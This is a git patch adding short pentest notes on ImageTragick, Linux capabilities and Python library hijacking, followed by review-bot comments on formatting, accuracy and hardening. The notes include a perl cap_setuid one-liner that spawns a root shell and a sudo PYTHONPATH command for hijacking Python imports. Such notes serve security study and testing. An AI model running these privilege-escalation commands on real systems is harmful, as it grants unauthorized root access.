From d9243ba0b6caaf183cd5a9d2b82e4c79b2fa965d Mon Sep 17 00:00:00 2001 From: whx Date: Sat, 9 Oct 2021 01:21:51 +0200 Subject: [PATCH] stuff --- exploit/imagemagick/imagetragick.md | 3 +++ exploit/linux/capabilities.md | 6 ++++++ exploit/python/lib_hijack.md | 22 ++++++++++++++++++++++ 3 files changed, 31 insertions(+) create mode 100644 exploit/imagemagick/imagetragick.md create mode 100644 exploit/python/lib_hijack.md diff --git a/exploit/imagemagick/imagetragick.md b/exploit/imagemagick/imagetragick.md new file mode 100644 index 0000000..0d80eb1 --- /dev/null +++ b/exploit/imagemagick/imagetragick.md @@ -0,0 +1,3 @@ +# ImageTragick + +* [ImageTragick Website](https://imagetragick.com) diff --git a/exploit/linux/capabilities.md b/exploit/linux/capabilities.md index a524736..2a393a4 100644 --- a/exploit/linux/capabilities.md +++ b/exploit/linux/capabilities.md @@ -3,6 +3,12 @@ * [HackTricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities) ## Usage +* Find capabilities ```sh getcap -r / 2>/dev/null ``` + +* `cap_setuid` through `/bin/perl` +```sh +perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh"' +``` diff --git a/exploit/python/lib_hijack.md b/exploit/python/lib_hijack.md new file mode 100644 index 0000000..81de964 --- /dev/null +++ b/exploit/python/lib_hijack.md 
@@ -0,0 +1,22 @@ +# Library Hijacking + +* [Article](https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8) + +## Interpreter might be called invoking sudo +* Write into a library called inside the script + +## Path call order of packages +* Order of paths which are invoked to find packages may be found via +```sh +python -c 'import sys; print("\n".join(sys.path))' +``` +* Higher order directory on a path may have write permission. Insert a similar named package that gets called in the script. +* The highest order is `pwd` + +## Redirecting PYTHONPATH +* `SETENV` may be set while loading script through `sudo` +```sh +sudo PYTHONPATH=/tmp/ /usr/bin/python3.6 +``` + +
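Review bot: in the `exploit/imagemagick/imagetragick.md` hunk, the new file is only a heading and a link, which gives a reader nothing to act on; a page titled ImageTragick should state at least what the issue is, which ImageMagick versions are affected, and how it is mitigated (upgrading, or a restrictive `policy.xml` that disables the affected coders), with the link kept as the reference.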
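Review bot: in the `exploit/linux/capabilities.md` hunk, the two new bullets (`* Find capabilities` and `* \`cap_setuid\` through \`/bin/perl\``) sit directly on top of their ```sh fences; add a blank line between each bullet and its fence, as the hunk already does between the two bullets. The second bullet names `/bin/perl` while the command runs a bare `perl`; keep the two consistent. Since `getcap -r / 2>/dev/null` is also the audit command, one line stating that an interpreter carrying `cap_setuid` is equivalent to a setuid-root binary and should have the capability removed (`setcap -r`) would make the section useful for hardening as well.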
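Review bot: in the `exploit/python/lib_hijack.md` hunk, the bullet `The highest order is \`pwd\`` is inaccurate: `sys.path[0]` is the directory of the script being run, and it is the current directory only for `-c` and interactive use (which is why the `python -c 'import sys; ...'` probe prints an empty first entry); word it as the script's own directory. The bullet `\`SETENV\` may be set while loading script through \`sudo\`` should say where that is configured (the `SETENV` tag or `setenv` option in sudoers) and that the default `env_reset` without `PYTHONPATH` in `env_keep` is what prevents it; the hardcoded `/usr/bin/python3.6` in that command also belongs behind a placeholder. The heading `## Interpreter might be called invoking sudo` and the bullet `Write into a library called inside the script` need rewording for grammar, and `Higher order directory on a path` reads better as "a directory earlier in the path". The two trailing `+` empty lines leave blank lines at the end of the file and should be dropped.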